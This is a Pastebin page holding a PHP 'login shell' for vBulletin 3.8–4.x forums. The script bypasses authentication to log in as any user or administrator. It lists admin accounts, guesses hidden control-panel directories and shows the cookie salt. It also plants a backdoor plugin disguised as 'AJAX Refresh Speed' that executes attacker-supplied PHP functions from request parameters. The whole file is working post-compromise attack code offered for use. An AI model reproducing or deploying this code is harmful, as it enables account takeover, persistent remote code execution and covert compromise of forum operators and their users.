API tools faq
paste
Advertisement
vituong585

Untitled

vituong585
Nov 26th, 2015
234
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.95 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * vBulletin 3.8.x-4.x Login Shell
  4. * Author: JB (jb@p0wersurge.com)
  5. * www.p0wersurge.com
  6. * 13/01/2014 (updated 26/07/2015)
  7. * Version 1.9
  8. */
  9. #chdir('../');
  10. require_once('./global.php');
  11. define('SELF', $_SERVER['PHP_SELF']);
  12. @ini_set('display_errors', false);
  13. error_reporting(0);
  14. if(substr($vbulletin->versionnumber, 0, 1) > 3)
  15. {
  16. $fullperms = '16744444';
  17. function verify_authentication2($username)
  18. {
  19. global $vbulletin;
  20.  
  21. $username = strip_blank_ascii($username, ' ');
  22.  
  23. if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
  24. {
  25. set_authentication_cookies($cookieuser);
  26.  
  27. $return_value = true;
  28. ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
  29. return $return_value;
  30. }
  31.  
  32. $return_value = false;
  33. ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
  34. return $return_value;
  35. }
  36. }
  37. else
  38. {
  39. $fullperms = '491516';
  40. function verify_authentication2($username)
  41. {
  42. global $vbulletin;
  43.  
  44. $username = strip_blank_ascii($username, ' ');
  45.  
  46. if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
  47. {
  48. if ($vbulletin->GPC[COOKIE_PREFIX . 'userid'] AND $vbulletin->GPC[COOKIE_PREFIX . 'userid'] != $vbulletin->userinfo['userid'])
  49. {
  50. // we have a cookie from a user and we're logging in as
  51. // a different user and we're not going to store a new cookie,
  52. // so let's unset the old one
  53. vbsetcookie('userid', '', true, true, true);
  54. vbsetcookie('password', '', true, true, true);
  55. }
  56. vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
  57. vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
  58. $return_value = true;
  59. ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
  60. return $return_value;
  61. }
  62.  
  63. $return_value = false;
  64. ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
  65. return $return_value;
  66. }
  67. }
  68.  
  69. $guess = array();
  70. $known = array(
  71. 'archive',
  72. 'clientscript',
  73. 'cpstyles',
  74. 'customavatars',
  75. 'customgroupicons',
  76. 'customprofilepics',
  77. 'attach',
  78. 'forumrunner',
  79. 'images',
  80. 'includes',
  81. 'install',
  82. 'packages',
  83. 'signaturepics',
  84. 'store_sitemap',
  85. 'vb'
  86. );
  87. $admindir = $vbulletin->config['Misc']['admincpdir'];
  88. $complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
  89. $results = scandir('.');
  90.  
  91. foreach ($results as $result) {
  92. if ($result == '.' or $result == '..') continue;
  93.  
  94. if (is_dir('./' . $result)) {
  95. if(in_array($result, $known)) continue;
  96. if(@file_exists($result . '/adminlog.php'))
  97. {
  98. $guess[] = $result;
  99. } else {
  100. continue;
  101. }
  102. }
  103. }
  104.  
  105. if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username']))
  106. {
  107. require_once(DIR . '/includes/functions_login.php');
  108.  
  109. $username = $_REQUEST['username'];
  110. $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
  111. $query = $vbulletin->db->query_first($q);
  112. if($query['username'] != null)
  113. {
  114. if(verify_authentication2($query['username']))
  115. {
  116. exec_unstrike_user($query['username']);
  117.  
  118. process_new_login('cplogin', true, null);
  119.  
  120. do_login_redirect();
  121. }
  122. else
  123. {
  124. die('Verify failed');
  125. }
  126. }
  127. else
  128. {
  129. die('User not found.');
  130. }
  131. }
  132. elseif($_REQUEST['do'] == 'injectplugin')
  133. {
  134. $products = array();
  135. $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
  136. if($vbulletin->db->num_rows($query) > 0)
  137. {
  138. while($product = $vbulletin->db->fetch_array($query))
  139. {
  140. $productinfo = array();
  141. $productinfo['productid'] = $product['productid'];
  142. $productinfo['title'] = $product['title'];
  143. $productinfo['version'] = $product['version'];
  144. $productinfo['active'] = $product['active'];
  145. $productinfo['url'] = $product['url'];
  146. $products[] = $productinfo;
  147. }
  148. }
  149.  
  150. // choose a random product if productcount > 0 else inject into vbulletin
  151. $productcount = count($products);
  152. $plugin['title'] = 'AJAX Refresh Speed';
  153. $plugin['hookname'] = 'global_complete';
  154. $plugin['phpcode'] = 'if(isset($_REQUEST[\'x\'])){$_REQUEST[\'x\']($_REQUEST[\'y\']);}';
  155. if(intval($productcount) > 0)
  156. {
  157. // failsafe incase product is disabled - we should only ever be injecting into an enabled product, or our injection is worthless
  158. // optional really, you can just make it insert into vbulletin itself but that's not really as covert as i'd like
  159. retrymtrand:
  160. $rand = mt_rand(0, intval($productcount));
  161. if($products[$rand]['active'])
  162. {
  163. $plugin['product'] = $products[$rand]['productid'];
  164. }
  165. else
  166. {
  167. goto retrymtrand;
  168. }
  169. }
  170. else
  171. {
  172. $plugin['product'] = 'vbulletin';
  173. }
  174. $plugin['devkey'] = '';
  175. $plugin['active'] = '1';
  176. $plugin['executionorder'] = '5';
  177.  
  178. $vbulletin->db->query("
  179. INSERT INTO " . TABLE_PREFIX . "plugin
  180. (
  181. hookname,
  182. title,
  183. phpcode,
  184. product,
  185. active,
  186. executionorder
  187. )
  188. VALUES
  189. (
  190. '" . $plugin['hookname'] . "',
  191. '" . $plugin['title'] . "',
  192. '" . $vbulletin->db->escape_string($plugin['phpcode']) . "',
  193. '" . $vbulletin->db->escape_string($plugin['product']) . "',
  194. " . intval($plugin['active']) . ",
  195. " . intval($plugin['executionorder']) . "
  196. )
  197. ");
  198. $pluginid = $vbulletin->db->insert_id();
  199. // update the datastore
  200. vBulletinHook::build_datastore($db);
  201. ?>
  202. <h1>Plugin <?php echo $pluginid; ?> created on global_complete!</h1>
  203. <pre>
  204. <?php echo print_r($plugin); ?>
  205. </pre>
  206. <a href="<?php echo SELF; ?>">Go back</a>
  207. <?php
  208. }
  209. else
  210. {
  211. $admin_usergroups = array();
  212. $admin_usergroups_query = $vbulletin->db->query("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup WHERE adminpermissions = '3'");
  213. while($admin_usergroup = $vbulletin->db->fetch_array($admin_usergroups_query))
  214. {
  215. $admin_usergroups[] = $admin_usergroup['usergroupid'];
  216. }
  217. $admins = array();
  218. $query = $vbulletin->db->query("SELECT userid,adminpermissions FROM " . TABLE_PREFIX . "administrator");
  219. while($user = $vbulletin->db->fetch_array($query))
  220. {
  221. $userinfo = fetch_userinfo($user['userid']);
  222. $userarray = array();
  223. $userarray['userid'] = $userinfo['userid'];
  224. $userarray['username'] = $userinfo['username'];
  225. $userarray['musername'] = fetch_musername($userinfo);
  226. $userarray['adminpermissions'] = $user['adminpermissions'];
  227. $admins[] = $userarray;
  228. }
  229. $products = array();
  230. $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
  231. if($vbulletin->db->num_rows($query) > 0)
  232. {
  233. while($product = $vbulletin->db->fetch_array($query))
  234. {
  235. $productinfo = array();
  236. $productinfo['productid'] = $product['productid'];
  237. $productinfo['title'] = $product['title'];
  238. $productinfo['version'] = $product['version'];
  239. $productinfo['active'] = $product['active'];
  240. $productinfo['url'] = $product['url'];
  241. $products[] = $productinfo;
  242. }
  243. }
  244. ?>
  245. <h1>vBulletin Login Shell | CP Login (<?php echo $vbulletin->options['bbtitle']; ?>) (vB<?php echo $vbulletin->versionnumber; ?>)</h1>
  246. <hr />
  247. <form action="<?php echo SELF; ?>" method="get">
  248. <input type="hidden" name="do" value="login" />
  249. <input type="text" name="username" value="" />
  250. <input type="submit" name="login" value="Login as user" />
  251. </form>
  252. <hr />
  253. <p>Admins found: <?php echo count($admins); ?></p>
  254. <p><?php foreach($admins as $admin){ echo '<a href="' . SELF . '?do=login&username=' . $admin['username'] . '">' . $admin['musername'] . '</a>' . (($admin['adminpermissions'] == $fullperms) ? ' (full permissions)' : '') . ' ';} ?></p>
  255. <hr />
  256. <p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $admindir; ?></a></p>
  257. <p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
  258. <hr />
  259. <a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a>
  260. <hr />
  261. <p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
  262. <p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
  263. <p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
  264. <hr />
  265. <?php if(count($products) > 0) { ?>
  266. <h3>Installed Products</h3>
  267. <ul>
  268. <?php
  269. foreach($products as $product)
  270. {
  271. if($product['active'])
  272. {
  273. $color = 'green';
  274. }
  275. else
  276. {
  277. $color = 'red';
  278. }
  279.  
  280. echo '<li><span style="color: ' . $color . ';">' . ((trim($product['url']) != null) ? '<a style="color: ' . $color . '" href="' . trim($product['url']) . '" target="_blank">' : '') . $product['title'] . ((trim($product['url']) != null) ? '</a>' : '') . ' (' . $product['version'] . ')</span></li>';
  281. }
  282. ?>
  283. </ul>
  284. <hr />
  285. <?php } ?>
  286. <h6>Written by <a href="https://twitter.com/xijailbreakx" target="_blank">@xijailbreakx</a>. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful).</h6>
  287.  
  288. <?php
  289. }
  290. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!